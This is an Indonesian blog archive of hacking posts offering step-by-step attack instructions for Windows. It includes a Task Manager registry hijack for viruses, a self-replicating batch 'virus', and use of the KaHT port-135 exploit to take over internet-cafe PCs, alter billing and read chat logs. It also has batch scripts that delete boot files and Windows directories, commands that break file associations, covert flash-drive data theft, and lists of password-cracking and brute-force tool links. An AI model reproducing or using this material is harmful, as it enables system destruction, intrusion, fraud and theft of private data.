Tampilkan postingan dengan label Dangerous. Tampilkan semua postingan
Tampilkan postingan dengan label Dangerous. Tampilkan semua postingan
Perbedaan Virus dan Worm
Banyak terjadi kesalah pahaman mengenai virus dan worm. Misalnya saja worm: Gadis Desa, itu hanya sebuah worm yang kecil namun kebanyakan dari khalayak umum menyebut worm itu virus Gadis Desa. Nah lo kok worm bisa jadi virus sih?? Ternyata pemahaman khalayak umum mengenai worm dan virus itu masih kurang. Mereka kadang menyebut program yang mencemari, memiliki kemampuan untuk menggandakan diri itu, mereka sebut itu virus. Agar bisa lebih memahaminya,Mari kita pelajari lebih mendalam perbedaan keduanya???

Download artikel lengkap:
Menyisipkan Virus Pada Windows Task Manager
Windows Task Manager merupakan tools bawaan windows untuk memantau aplikasi-aplikasi yang sedang berjalan, baik yang tampil maupun yang berjalan secara background. Melalui aplikasi ini user bisa melakukan penghentian suatu proses background secara paksa, menghentikan proses yang tidak dikehendaki atau menghentikan suatu aplikasi yang mengalami kondisi Not Responding.



Begitu pula ketika tersadar bahwa komputer kesayangannya terserang Virus/Worm, kebanyakan user akan secara reflek menggunakan tiga jari sakti-nya untuk menekan [Ctrl]+[Alt]+[Del] guna memanggil Windows Task manager dengan tujuan menghentikan proses si Virus/Worm.



Cara lain untuk memanggil Task Manager ialah dengan melakukan klik kanan pada area kosong Taskbar lalu memilih menu Task manager. Bisa juga dengan mengetikkan TASKMGR pada kotak dialog RUN (Start -> Run). Atau dengan mengeksekusi langsung file taskmgr.exe yang berada di system directory (C:\WINDOWS\System32\).



Karena kemampuannya untuk memantau proses yang sedang berjalan dan menghentikannya secara paksa inilah yang membuat kebanyakan penulis Virus akan berusaha untuk mencegah user mengakses Windows Task Manager agar Virus/Worm yang diciptakannya sulit dihentikan.



Jika Anda sedang melakukan eksperimen dengan Virus/Worm, ada sedikit trik untuk 'menyisipkan' Virus/Worm Anda pada Windows Task Manager supaya nantinya ketika user mengakses Windows Task Manager justru Worm/Virus Andalah yang dijalankan, bukan Windows Task manager itu sendiri.



Okay, kita mulai eksperimen kita ;)



1. Bukalah Registry Editor, (Start) -> (Run) ketik REGEDIT

2. Pergilah ke lokasi berikut:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe



3. Buatlah sebuah string value dengan nama Debugger (Klik kanan pada area kosong

panel sebelah kanan, pilih New lalu klik String Value. Beri nama Debugger).

4. Klik ganda pada String Value yang baru Anda buat tadi. Isikan lokasi Virus

Anda pada form isian Value Data. Atau sebagai percobaan, masukkan saja lokasi

Windows Command Processor -> C:\WINDOWS\System32\cmd.exe

Kemudian Klik [OK] sesudahnya.

5. Kini cobalah untuk mengakses Windows Task Manager dengan menekan kombinasi

[Ctrl]+[Alt]+[Del] atau klik kanan pada area kosong Taskbar lalu pilih menu

Task manager ... atau.. terserah Anda laah.. ^_^ dan... TA..DAAAAAA....!!
Task manager Anda tidak akan tampil. Yang berjalan justru Windows Command Processor sesuai dengan yang Anda isikan pada Value Data tadi.



Nah, kini Anda bisa mengimplementasikannya dalam Virus/Worm ciptaan anda. Dengan demikian user tidak akan bisa mengakses Windows Task Manager. Ketika user berusaha melakukan pengaksesan Task Manager, justru Virus/Worm Andalah yang berjalan ;)



Trik ini sebenarnya bisa juga diterapkan untuk hal-hal baik. Misalnya saja Anda merasa kurang puas dengan Windows Task Manager dan Anda ingin mengganti aplikasi tersebut dengan aplikasi sejenis yang memiliki kemampuan lebih baik, maka Anda bisa menerapkan trik ini untuk tujuan tersebut.

Sumber :http://teguhtheevolution.blogspot.com/
Bikin Virus dengan Perintah CMD
Bagi yang tidak bisa bahasa pemrograman ada satu cara yang gampang dan sangat mudah untuk membuat semacam virus.

Yang perlu dipersiapkan:

1. Software Quick Batch File Compiler (quickbfc.exe)
2. License key atau crack dari quickbfc
3. Pengetahuan akan perintah cmd
4. Software Icon Changer

quickbfc adalah software dari www.abyssmedia.com yang mana software ini bisa digunakan untuk mengcompile (atau apa aja deh namanya) perintah2 cmd menjadi file exe.
Salah satu keistimewaan quickbfc ini adalah kemampuannya untuk menjadikan file exe yang dibuat ketika di run tidak akan menampilkan jendela console. Fitur ini bisa diset dengan memilih project=>option=>ghost application. Hanya saja yang bisa menggunakan fitur ini hanyalah full version (atau bisa juga di crack).

Icon Changer (IC) diperlukan untuk mencari icon seperti icon kepunyaan windows.
IC dapat didownload di http://www.shelllabs.com.
Setelah membuka IC, search icon di folder windows\system32 , disitu akan ada banyak icon yang menarik, seperti icon folder, icon text,dll. Setelah ketemu icon yg diinginkan simpan icon tersebut.

Sekarang kita bahas masalah perintah cmdnya. Salah satu ciri virus yaitu kemampuan menggandakan diri. Seperti kita ketahui jika kita membuat bat file dg isinya “ copy %0 c:\ “ maka akan berakibat file bat tadi dicopikan ke c:\. Tapi ketika kita menggunakan perintah yg sama di quickbfc maka hasilnya tidak seperti itu, dalam artian file exe yang dihasilkan ketika di run tidak akan di copi ke drive c:\. Untuk menyiasati hal ini kita bisa menggunakan cara lain yaitu dengan perintah “for %%a in (*.exe) do if %%~za equ 12345 copy %%a c:\arira.exe “ .

Perintah ini berarti “ untuk setiap file exe dalam direktori ini jika file berukuran 12345 bytes maka copikan file (yg berukuran 12345 bytes tadi ) ke c:\ dg nama arira.exe “. 12345 adalah ukuran file virus hasil kompile dari quickbfc (misalnya) . Permasalahan yg ada adalah jika ada file exe yg ukurannya sama dan berada pada folder yg sama dengan file virus kita.

Ok,selanjutnya buat perintah lainnya.
Kita buat agar kalau virus kita di run akan membuka my documents. Perintahnya “ explorer %userprofile% “.
Terusss, perintah yang ini bisa sedikit menjengkelkan for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d” ,perintah ini berarti “untuk setiap folder, subfolder di drive c copikan file c:\arira.exe di folder kalian dengan nama cinta.exe”. maka setelah perintah ini selesai dieksekusi semua folder dan subfolder di c:\ akan memiliki file cinta.exe.
Dan seterusnya….dan seterusnya pikirkan sendiri perintahnya…..misalkan bikin value di regedit biar si virus bisa hidup lagi setelah computer restart,dll.

Contoh: perintah cmd yang sudah kita buat

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 12345 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip

Sebelum dikompile pilih custom resources untuk menset icon dari file yang akan dihasilkan. Kompile skript diatas, kemudian lihat ukuran file exe yang dihasilkan. Misalkan ukuran file yang dihasilkan adalah 82571, maka ganti skript diatas sehingga menjadi

REM ini adalah awal dari skrip
for %%a in (*.exe) do if %%~za equ 82571 copy “%%a” c:\arira.exe
explorer %userprofile%
for /R c:\ %%d in (cinta.exe) do copy c:\arira.exe “%%d”
REM ini adalah akhir dari skrip

Kompile ulang, lihat ukuran file yang dihasilkan. Jika ukurannya 82571 bytes maka sudah benar. Jika belum, ulangi sampai angka pada skript sama dengan ukuran file yang dihasilkan.

Keterangan:
Pada contoh perintah diatas “for %%a in (*.exe) do if %%~za equ 82571 copy %%a c:\arira.exe “ tidak bisa digunakan untuk cmd (hanya bisa untuk skript), kalau pingin menggunakan perintah ini dalam cmd makan ganti %%a dengan %a sehingga perintahnya akan menjadi “ for %a in (*.exe) do if %~za equ 82571 copy %a c:\arira.exe “

Sumber :http://teguhtheevolution.blogspot.com/
Menjadi Siluman Warnet
OK jika emang uda bulat niat anda umtuk ber-experimen....

Pertama-tama anda harus mendownload 2 program penting yaitu :

1. kaht


2. Internet Maniac

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehehe..
Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.



Untuk Windows XP, Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac, masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHN, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaH) maka ketikkan “CD\KaHT” dan seterusnya.

Jika sudah, ini saatnya…

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho.
Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja
Nah disini nanti program akan bekerja otomatis.
Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai.
Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe

Nah kalo udah begini kita bisa berkreasi :

Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.

Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehehe..

Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas.

Sumber :http://teguhtheevolution.blogspot.com/
Merusak File pada Windows
Buat kalian yang punya keinginan merusak file dalam Windows, caranya gampang kok, tinggal mengganti extension file aja, makanya baca dan ikuti langkah ni aja, heheheh.Sebagai contoh, kalian ingin merusak file mp3,caranya :

assoc .mp3=.teguhzblog

nahh,jadi semua file yang berextensi .mp3 akan berubah menjadi .teguhzblog dan file tersebut tidak akan dapat dijalankan..!!!

Saya cuma mau bilang hati-hati aja menggunakan trik ini, hehehehhe

SELAMAT MENCOBA!!

Sumber :http://teguhtheevolution.blogspot.com/
KODE PENGHANCUR WINDOWS
Langsung aja ya?buka notepad lalu liat dan perhatikan kode dibawah ini :

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Copy-paste kode diatas ke notepad lalu simpan dengan ekstensi .bat----
OK, aku jelaskan scriptnya masing-masing :
del c:\autoexec.bat <-- buat hapus autoexe.bat di direktori C
del c:\boot.ini <---- buat hapus Boot.ini di direktori C
del c:\ntldr <--- buat hapus ntldr del c:\windows\win.ini <----- untuk hapus file win.ini yang berlokasi di C
C:/windows attrib -r -s -h <--- untuk menampilkan file ke 4 windows tadi yang di supper hidden tanpa file autoexec.bat, boot.ini, ntldr, dan win.ini komputer yang bersistem operasikan windows tdk akan mau hidup...hehehhehe...
Sumber :http://teguhtheevolution.blogspot.com/
LINK Tool Hacking
MagicFilter
Code:
http://www.freewebs.com/t800t/MagicFilter.rar

Raptor3 [ belt sinicizes patch ]
Code:
http://www.freewebs.com/t800t/Raptor3.zip


The SuperDic_V3.2 registration version [ easy superior super dictionary production tool, function to be good ]
Code:
http://www.freewebs.com/t800t/SuperDic_V32.zip




Pwdmaker_1.151
Code:
http://www.freewebs.com/t800t/pwdmaker_1.151.rar


Decodes the tool: John the Ripper
Code:
http://www.xisp.org/downloads/jtr.zip


AUthX
Code:
http://www.freewebs.com/t800t/AUthX.rar


Withdraws the password and processes the LOG files tool:

Z_nakeR2 [ very good log processing tool may process the many kinds of log documents ]
Code:
http://www.freewebs.com/t800t/Z_nakeR2.zip


ccbrip
Code:
http://www.xisp.org/downloads/ccbillrip.zip


ibillrip
Code:
http://www.xisp.org/downloads/ibillrip.zip


*Accessdiver (AD) by Jean Fages
Code:
http://www.accessdiver.com


*Sentry by Sentinel:
Code:
http://sentinel.deny.de/sentry.php


*Form@ (specifically for FORM sites) by SSS -
Code:
http://sss.deny.de/


Caecus by Sentinel (For form sites that require an OCR [t4wsentry.pl])
Code:
http://sentinel.deny.de/Caecus.php


Ares by Gamoaa -
Code:
http://www.xisp.org/downloads/FACE_Setup.zip



Brutus
Code:
http://www.hoobie.net/brutus/


AuthForce by Zachary P. Landau
Code:
http://kapheine.hypa.net/authforce/index.html


Entry by Sparkleware
Code:
http://www.sparkleware.com/entry/index.html


Xavior By LithiumSoft
Code:
http://www.btinternet.com/~lithiumsoft/Products.html


Web Password Checker (WPC) .1 For UNIX by g1soft
available @
Code:
http://www.securityfocus.com/tools/885/scoreit


Munga Bunga's http Brute Forcer by Munga Bunga
Code:
http://www.hackology.com


Wordlist Tools:

*Raptor 3 by Madmax -
Code:
http://madmax.deny.de/downloads/raptor.zip


Words Extractor
Code:
http://www.intellitamper.com/wordsextractor/


Lucifer by Rhino -
Code:
http://rhino.deny.de/lucifer.php


ALS_novice by Wolfman -
Code:
http://wolfman.deny.de/tools.html


Z-leecher by Beda
Code:
http://goldmaster.webpark.cz/sleech.html


S-Generator by Beda
Code:
http://goldmaster.webpark.cz/sgen.html


S-WordlistTool by Beda
Code:
http://goldmaster.webpark.cz/swordt.html


Proxy Tools:

*Proxyrama By Gaamoa -
Code:
http://gaamoa.deny.de/


*Charon by Rhino -
Code:
http://www.icefortress.com/hosts/rhino/


*Advanced Proxy Leecher (APL) by Sentinel-
Code:
http://sentinel.deny.de/apl.htm


Geowhere by Jean Fages (NOT-Freeware) -
Code:
http://www.geowhere.net/


Proxy List Filter -
Code:
http://www.freeproxy.ru/en/programs/proxy_filter.htm


AATools by Glocksoft
Code:
http://www.glocksoft.com/aatools.htm


Proxy Bag
Code:
http://www.intellitamper.com/proxybag/


S-Proxy Tool by Beda
Code:
http://goldmaster.webpark.cz/sproxy.html


Exploiting Tools:

*Triton (Scanner) by Rhino -
Code:
http://rhino.deny.de/triton/index.php


*CMX IV by Xtremnet -
Code:
http://xtremet.deny.de/products.htm


CCBill Local Cgi Exploiter By Ksoze-
Code:
http://ksoze.deny.de/ccbill_exp.html


IBT2 by wolfman:
Code:
http://wolfman.deny.de/tools.html


Hephaestus's Ashen Spear by Wolfman:
Code:
http://wolfman.deny.de/HAS.php


Intellitamper
Code:
http://www.intellitamper.com/infos.php


Putty
Code:
http://www.chiark.greenend.org.uk/~sgtatham/putty/


Decrypting Tools:

*John The Ripper (JTR) -
Code:
http://www.openwall.com/john/


MDcrack (MD5 Cracker) -
Code:
http://membres.lycos.fr/mdcrack/


Distributed John The Ripper by Luis Parravicini
Code:
http://ktulu.com.ar/en/djohn.php


Cain and Abel by Massimiliano Montoro
Code:
http://www.oxid.it/cain.html


Salt Grinder by Wolfman
Code:
http://wolfman.deny.de/SaltGrinder.php


Log Tools:

LogRip by Rhino -
Code:
http://rhino.deny.de/logrip.php


Azarius by Rhino -
Code:
http://rhino.deny.de/azarius.php


Zimapass Parser by Sentinel:
Code:
http://sentinel.deny.de/zimaparser.htm


*C-Parse (ccbill.log parser) by Sentinel:
Code:
http://sentinel.deny.de/c_parse.htm


CCBill USI (CCBILL log parser that removes all dead account PRIOR to decrypting)
Code:
http://membres.lycos.fr/ccbill/


Accessdiver/Ares Parser by Sentinel:
Code:
http://sentinel.deny.de/ad_ares_parser.htm


Spoofers:

Zspoof by wolfman -
Code:
http://wolfman.deny.de/tools.html


Sploof by Jean Fages -
Code:
http://www.accessdiver.com/sploof.htm


Final Spoof
Code:
http://www.beatharness.com/finalspoof/


Spooph by nast0
Code:
http://24.106.100.133/spooph/index.html


D-Spoof And Others (Russian Site, English Prog)
Code:
http://mspoofer.pisem.net/zaza/index.htm


Mikho's Online Spoofer (web based spoofer)
Code:
http://mikho.kicks-ass.net/spoofs/spoofs.hta


QuickSpoof
Code:
http://httpd.chello.nl/~m-koster2/spoofs.htm


Other Tools:

Code:
Scholar by Sentinel - (History checker)
http://sentinel.deny.de/scholar.htm


Crackmate Gold by Xtremet (adultcheck gold pass verifier) -
Code:
http://xtremet.deny.de/products.htm


Sumber : http://online-hacker.blogspot.com/




BELAJAR JADI MANUSIA BERGUNA

Download video tutorial hacking WEP wireless

128 Bit Wep Cracking With Injection!.swf
http://rapidshare.com/files/31477043/hv1.rar

A Penetration Attack Reconstructed.avi
http://rapidshare.com/files/31480758/hv2.rar

A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf
http://rapidshare.com/files/31481861/hv3.rar

Adding Modules to a Slax or Backtrack Live CD from Windows.swf
http://rapidshare.com/files/31482388/hv4.rar

Airplay replay attack – no wireless client required.swf
http://rapidshare.com/files/31482894/hv5.rar

Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf
http://rapidshare.com/files/31483265/hv6.rar

BackTrack LiveCD to HD Installation Instruction Video.swf
http://rapidshare.com/files/31483709/hv7.rar

Basic Nmap Usage!.swf
http://rapidshare.com/files/31484459/hv8.rar

Basic Tools for Wardriving!.swf
http://rapidshare.com/files/31485447/hv9.rar

Bluesnarfer attack tool demonstration.swf
http://rapidshare.com/files/31486249/hv10.rar

Bluesnarfing a Nokia 6310i hand set.avi
http://rapidshare.com/files/31486983/hv11.rar

Breaking WEP in 10 minutes.avi
http://rapidshare.com/files/31489615/hv12.rar

Cain to ARP poison and sniff passwords!.avi
http://rapidshare.com/files/31489735/hv13.rar

Complete Hacking Video using Metasploit – Meterpreter.swf
http://rapidshare.com/files/31490690/hv14.rar

Cracking a 128 bit WEP key (Auditor).swf
http://rapidshare.com/files/31496176/hv15.rar

Cracking a 128 Bit Wep key + entering the cridentials.swf
http://rapidshare.com/files/31498043/hv16.rar

Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf
http://rapidshare.com/files/31498481/hv17.rar

Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf
http://rapidshare.com/files/31499002/hv18.rar

Cracking WPA Networks (Auditor).swf
http://rapidshare.com/files/31500300/hv19.rar

DoS attack against Windows FTP Server – DoS.avi
http://rapidshare.com/files/31501194/hv20.rar

Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf
http://rapidshare.com/files/31501876/hv21.rar

Exploiting some bugs of tools used in Windows.swf
http://rapidshare.com/files/31504093/hv22.rar

Exploiting weaknesses of PPTP VPN (Auditor).swf
http://rapidshare.com/files/31505446/hv23.rar

Finding Rogue SMB File Shares On Your Network!.swf
http://rapidshare.com/files/31505931/hv24.rar

Fun with Ettercap Filters!.swf
http://rapidshare.com/files/31506167/hv25.rar

How to crack the local windows passwords in the SAM database.swf
http://rapidshare.com/files/31506295/hv26.rar

How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf
http://rapidshare.com/files/31509029/hv27.rar

How to sniff around switches using Arpspoof and Ngrep!.avi
http://rapidshare.com/files/31512416/hv28.rar

Install VNC Remotely!.avi
http://rapidshare.com/files/31512417/hv29.rar

Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi
http://rapidshare.com/files/31512418/hv30.rar

Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi
http://rapidshare.com/files/31514267/hv31.rar

John The Ripper 1.7 password cracker Installation Instruction Video.swf
http://rapidshare.com/files/31514447/hv32.rar

Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf
http://rapidshare.com/files/31514918/hv33.rar

MAC Bridging with Windows XP and Sniffing!.swf
http://rapidshare.com/files/31515325/hv34.rar

Mass De-Authentication using void11 (Auditor).swf
http://rapidshare.com/files/31516717/hv35.rar

Metasploit Flash Tutorial!.swf
http://rapidshare.com/files/31516967/hv36.rar

MITM Hijacking.wmv
http://rapidshare.com/files/31519959/hv37.rar

Nmap Video Tutorial 2 Port Scan Boogaloo!.swf
http://rapidshare.com/files/31522321/hv38.rar

Sniffing logins and passwords.avi
http://rapidshare.com/files/31522322/hv39.rar

Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi
http://rapidshare.com/files/31526967/hv41.rar

Sniffing VoIP Using Cain!.swf
http://rapidshare.com/files/31529820/hv42.rar

Snort Instruction video – howto install into backtrack.swf
http://rapidshare.com/files/31529822/hv43.rar

SSH Dynamic Port Forwarding!.swf
http://rapidshare.com/files/31529823/hv44.rar

Start a session and get interactive commandline access to a remote Windows box!.avi
http://rapidshare.com/files/31529824/hv45.rar

Telnet Bruteforce.avi
http://rapidshare.com/files/31529825/hv46.rar

Tunneling Exploits through SSH.avi
http://rapidshare.com/files/31529826/hv47.rar

Use Brutus to crack a box running telnet!.avi
http://rapidshare.com/files/31530857/hv48.rar

Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf
http://rapidshare.com/files/31530858/hv49.rar

WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf
http://rapidshare.com/files/31530859/hv50.rar

WMF File Code Execution Vulnerability With Metasploit!.swf
http://rapidshare.com/files/31530860/hv51.rar

WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf
http://rapidshare.com/files/31530861/hv52.rar
Label: TOOL HACKING
Ngeblocking Facebook!!
buat kalian yang merasa "anyel karo sing jenenge facebook", kalian bisa saja memblok facebook itu sendiri, hehehe.Caranya :
Silakan buka folder berikut di komputer anda.

C:\WINDOWS\system32\drivers\etc\hosts

Lalu tambahkan baris ini di dalamnya:

0.0.0.0 www.facebook.com

Nah, sekarang jika anda memasukkan www.facebook.com di browser maka browser akan bilang “connection close by remote server”.

SEGERA SAJA DICOBA YA!!!!!hehehehe
Sumber :http://teguhtheevolution.blogspot.com/
Program Perusak!!hehehhe
Buat kalian yang suka jahil, macam2, silahkan baca dan resapi artikel ini, bagi yang takut nggak usah baca saja deh, hehehe.
OK, nggak usah banyak bacot, langsung saja kiata mulai, hehehehe.Kamu tinggal copy-paste kode dibawah ini dan simpan dengan extensi .bat, berikut kodenya.Cukup diapalin aja ngaak usah ditulis, heheheh.

@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT


Yeah, kalau sudah disimpan misal coro.bat, kamu shutdown dan tinggalin aja komputer itu sendirian.Ntar programnya juga akan bekerja denagn sendirinya, heheheh.
SELAMAT MENCOBA....!!!
Mencuri data-data flashdisk orang
anda ingin emcuri data-data di flashdisk orang lain tanpa si orang itu tahu??gampang kok,, tinggal ambil aja flashdisknya, heheheheh,,bercanda.ni ada cara simple untuk melakukannya dengan diam-diam,, hehehhe.Dengan software yang namanya ThumbsuCK.exe, heheheh.caranya :
Setelah anda mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja anda letakkan di Local Drive D:\. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga. Ikuti panduan berikut:

1. Buatlah directory baru di D:\ atau dimanapun anda suka. Beri nama terserah anda.

Pada contoh ini saya beri nama gudangkorban. Salinlah ThumbSUCK.exe kedalam

directory tersebut lalu klik 2X untuk menjalankannnya.

2. Klik Start - Run lalu ketik cmd untuk memanggil Windows Command Processor

3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja

perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory

yang tadi dibuat adalah gudangkorban yang terletak di drive D:\ maka ketik:

attrib d:\gudangkorban +s +h

lalu tekan ENTER.


Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.


Karena directory gudangkorban diberi atribut super hidden, maka hilangkan terlebihdahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options (Tools -> Folder Options pada Windows Explorer).


Untuk mendisable aplikasi ini, gunakan Windows TaskManager (CTRL-ALT-DELETE) atau gunakan saja TaskMANAGER kesayangan anda.


Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? Hmm.. dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup ;p hehehe.. tentunya anda bisa panen data pribadi orang lain ^_^

Sumber :http://teguhtheevolution.blogspot.com/
Reset BIOS Berpassword
Tindakan me-reset setting BIOS/CMOS yg terpassword biasanya dpt
dilakukan dgn mem-bypass/merubah jumper di motherboard, tapi tips berikut ini
hanya melalui instruksi2 sederhana assembler, menggunakan program kecil
yg bernama debug.exe, .o ya instruksi ini utk PC berbasis windows.
Langkah2nya sbb :
* dari DOS prompt (c:\), ketik debug, yg seharusnya sdh ada sbg bagian
dari windows
* di layar akan muncul prompt khas program debug, berupa “-” tanpa
tanda petik.
* Dari prompt – ketik A, diikuti ENTER….di layar : -A
* Ketik mov cx,0 (angka nol, bukan huruf O)…di layar : -mov cx,0
* Akan muncul sederet angka hexadecimal, misalnya 0B05:0103, perhatikan
angka yg muncul di 3 digit terakhir, disini contohnya 103, akan
digunakan pd langkah terakhir
* Ketik mov ax,cx diikuti ENTER……..di layar : -mov ax,cx
* Ketik out 70,al diikuti ENTER……..di layar : -out 70,al
* Ketik mov ax,0 diikuti ENTER……..di layar : -mov ax,0
* Ketik out 71,al diikuti ENTER………di layar :-o ut 71,al
* Ketik inc cx diikuti ENTER……….di layar :-inc cx
* Ketik cmp cx,256 diikuti ENTER……di layar :-cmp cx,256
* Ketik JB 103(angka yg muncul di langkah awal), diikuti ENTER dua
kali, di layar : -jb 103
* Ketik g (sbg perintah GO)
* Restart/CTRL-ALT-DEL komputernya.
Instruksi lengkap sbb :
CODE :
C:\>debug
-A
0B05:0100 MOV CX,0
0B05:0103 MOV AX,CX
0B05:0105 OUT 70,AL
0B05:0107 MOV AX,0
0B05:010A OUT 71,AL
0B05:010C INC CX
0B05:010D CMP CX,256
0B05:0111 JB 103
0B05:0113

Sumber :http://teguhtheevolution.blogspot.com/
Merusak windows
Caranya :
Pertama buka command prompt dengan cara start - run - ketikan CMD.

Setelah tampilan command prompt tersebut keluar, maka ketikkan kode dibawah ini. Melalui kode inilah yang bisa merusak windows menjadi kota mati. ASSOC .exe=.hank 8 dari kode inilah semua program tidak bisa jalan ASSOC = Displays or modifies file extension associations.

Setelah anda ketik kode tersebut maka seluruh file yang berextensi .EXE akan
berubah menjadi .hank .

Sumber :http://teguhtheevolution.blogspot.com/
Ini dia 100 Malware terganas
1. Net-Worm.Win32.Kido.ih ( 41.9714%)
2. Exploit.Win32.SqlShell.a (9.7527%)
3. HEUR:Trojan.Win32.Generic (7.6628%)
4. Heur.Win32.Trojan.Generic (3.309%)
5. Trojan.Win32.FraudPack.owo (3.1%)
6. Trojan-Downloader.Win32.Agent.cgns (2.5427%)
7. Trojan.Win32.Agent.cltm (1.846%)
8. Trojan.Win32.FraudPack.oxv (1.7416%)
9. Trojan-Dropper.Win32.Small.axv (1.5674%)
10.Trojan.Win32.FraudPack.ovx (1.5674%)
11.Trojan-PSW.Win32.Agent.nfo (1.3236%)
12.Trojan.Win32.Buzus.bhqc (1.2539%)
13.Trojan.Win32.Agent2.kov (1.1494%)
14.Net-Worm.Win32.Kido.dam.y (1.1146%)
15.Heur.Win32.Invader (0.8708%)
16.Net-Worm.Win32.Kido.eo (0.8011%)
17.Trojan.Win32.Monder.cmwt (0.8011%)
18.Trojan-GameThief.Win32.Magania.bfru (0.7315%)
19.Trojan-Downloader.Win32.Agent.ansh (0.6618%)
20.Trojan-Dropper.Win32.Agent.zje (0.5921%
21.Trojan-Downloader.Win32.Agent.cgew (0.5921%)
22.Trojan-Downloader.Win32.Agent.wxq (0.5573%)
23.not-a-virus:Porn-Dialer.Win32.InstantAccess.f(0.5573%)
